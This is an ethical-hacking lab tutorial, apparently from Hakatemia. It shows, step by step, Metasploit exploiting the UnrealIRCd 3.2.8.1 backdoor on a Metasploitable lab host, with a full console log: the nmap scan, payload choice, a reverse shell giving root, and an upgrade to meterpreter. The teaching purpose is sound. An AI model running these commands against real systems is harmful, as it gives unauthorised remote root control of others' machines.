In this exercise, we will go through an example of how you can use Metasploit for exploiting a vulnerability. We will cover each step, so you can start the lab and follow along at your own pace.
Let's start with familiar steps, i.e. mapping. Start the database, prepare it, and perform initial scans with the db_nmap module. Note that ICMP (ping) is disabled on the target, so it won't respond to ICMP packets that nmap tries to use by default. You can disable ICMP usage by using the -Pn switch in nmap commands.
msf6 > db_nmap -Pn -p22,6667 -A 10.0.2.39
[*] Nmap: Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 21:22 UTC
[*] Nmap: Nmap scan report for 10.0.2.39
[*] Nmap: Host is up (0.000057s latency).
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh hostkey:
[*] Nmap: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
[*] Nmap: |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 6667/tcp open irc UnrealIRCd
[*] Nmap: | irc info:
[*] Nmap: | users: 1
[*] Nmap: | servers: 1
[*] Nmap: | losers: 1
[*] Nmap: | lservers: 0
[*] Nmap: | server: irc.Metasploitable.LAN
[*] Nmap: | version: Unreal3.2.8.1. irc.Metasploitable.LAN
[*] Nmap: | uptime: 0 days, 0:04:19
[*] Nmap: | source id: nmap
[*] Nmap: | source host: Test-946EE70D.local
[*] Nmap: |_ error: Closing Link: iztjsqbbs[attacker.local] (Quit: iztjsqbbs)
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: OS Fingerprint not ideal because: Missing a closed TCP port so results incomplete
[*] Nmap: No OS matches for host
[*] Nmap: Network Distance: 2 hops
[*] Nmap: Service Info: Host: irc.Metasploitable.LAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: TRACEROUTE (using port 22/tcp)
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 ...
[*] Nmap: 2 0.03ms 10.0.2.39
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.63 secondsWe see from the nmap output that the target system has the service named UnrealIRCd open and more specifically, version 3.2.8.1 of this service. The output also indicates that the server in question is Linux-based. Next, let's continue by checking if there is an exploit module available in Metasploit that we could use to exploit this IRC service.
msf6 > search Exploit Unreal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux)
1 exploit/windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32)
2 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
There is one exploit module available for this service and version that seems very promising. Let's select it and read more about it. We use the use command to select this module and then run the info command to see more information about it.
Basic options:
Name Current Setting Required Description
---- -------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 6667 yes The target port (TCP)
Payload information:
Space: 1024
Description:
This module Exploits a Malicious backdoor that was added to the
Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
Unreal3.2.8.1.tar.gz Archive between November 2009 and June 12th 2010.
References:
https://nvd.nist.gov/vuln/detail/CVE-2010-2075
OSVDB (65445)
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
The description tells us that this module exploits a backdoor that has been added to this version of the service by someone. Very interesting!
First, let's configure the module settings correctly.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.0.2.39
RHOSTS => 10.0.2.39
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- -------------- -------- -----------
RHOSTS 10.0.2.39 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
Next, let's set up the payload settings. We can list the payloads that this exploit module supports by using the show payloads command.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/adduser normal No Add user with useradd
1 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
2 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
3 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
4 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
5 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
6 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
7 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
8 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
9 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
10 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
11 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
12 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
We choose payload number 6 from the list, which creates a reverse connection, meaning the target system connects to our listener. It is important to remember that firewall settings often prevent payloads that allow us to establish a final connection to the target system but almost always allow the target system to make unrestricted outbound connections.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload payload/cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- -------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.2.39 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 6667 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- -------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listening port
Exploit target:
Id Name
-- ----
0 Automatic Target
As can be seen from the output, Metasploit payloads use port 4444 by default, to which the target system connects. This suits us as well, but we need to specify the LHOST parameter, which indicates the IP address where we want the listener to listen. (The machine can be in multiple different networks at the same time, so specifying this is a good idea).
We check our own IP address by running the regular ip a command.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > ip a
[*] exec: ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
11780: eth0@if11781: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 76:8f:58:15:db:b4 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.0.2.55/32 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::748f:58ff:fe15:dbb4/64 scope link
valid_lft forever preferred_lft foreverAfter this, we will set the IP as the LHOST parameter and double-check that all the settings are correct.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.0.2.55
LHOST => 10.0.2.55
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- -------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.2.39 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 6667 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- -------------- -------- -----------
LHOST 10.0.2.55 yes The listen address (an interface may be specified)
LPORT 4444 yes The listening port
Exploit target:
Id Name
-- ----
0 Automatic TargetAnd when we are sure the preparation for the attack is complete, we can execute the exploit with the exploit command.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > Exploit
[*] Started reverse TCP double handler is 10.0.2.55:4444
[*] 10.0.2.39:6667 - Connected to 10.0.2.39:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] 10.0.2.39:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 2mK6xqyIvvFWXRFt;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "2mK6xqyIvvFWXRFt\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.0.2.55:4444 -> 10.0.2.39:52094) at 2023-10-08 21:36:32 +0000
id
uid=0(root) gid=0(root) groups=0(root)Now we have successfully exploited the vulnerability in the target system and gained remote administrative access to the target computer.
Let's see next if we can upgrade this simple shell connection to a more versatile meterpreter connection. Let's start by moving the current remote management session to the background (CTRL-z). We can list the existing sessions with the sessions command. We can also jump back to a session with the sessions -i <id> command.
id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N] y
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.0.2.55:4444 -> 10.0.2.39:52094 (10.0.2.39)In Metasploit, there is a useful module post/multi/manage/shell_to_meterpreter that allows us to attempt to create a new remote management connection using the meterpreter payload. We will try it.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > Exploit
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler is 10.0.2.55:4433
[*] Sending stage (1017704 bytes) to 10.0.2.39
[*] Meterpreter session 2 opened (10.0.2.55:4433 -> 10.0.2.39:40716) at 2023-10-08 21:48:49 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.0.2.55:4444 -> 10.0.2.39:52094 (10.0.2.39)
2 meterpreter x86/linux root @ 10.0.2.39 10.0.2.55:4433 -> 10.0.2.39:40716 (10.0.2.39)
And voilà! - Now we have a functional meterpreter remote management connection to the target system.
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >It is best to try it out yourself and see what can be done with the connection in question. Start by reading the listing of the help command.
Ready to become an ethical hacker?
Start today.
As a member of Hakatemia you get unlimited access to Hakatemia modules, exercises and tools, and you get access to the Hakatemia Discord channel where you can ask for help from both instructors and other Hakatemia members.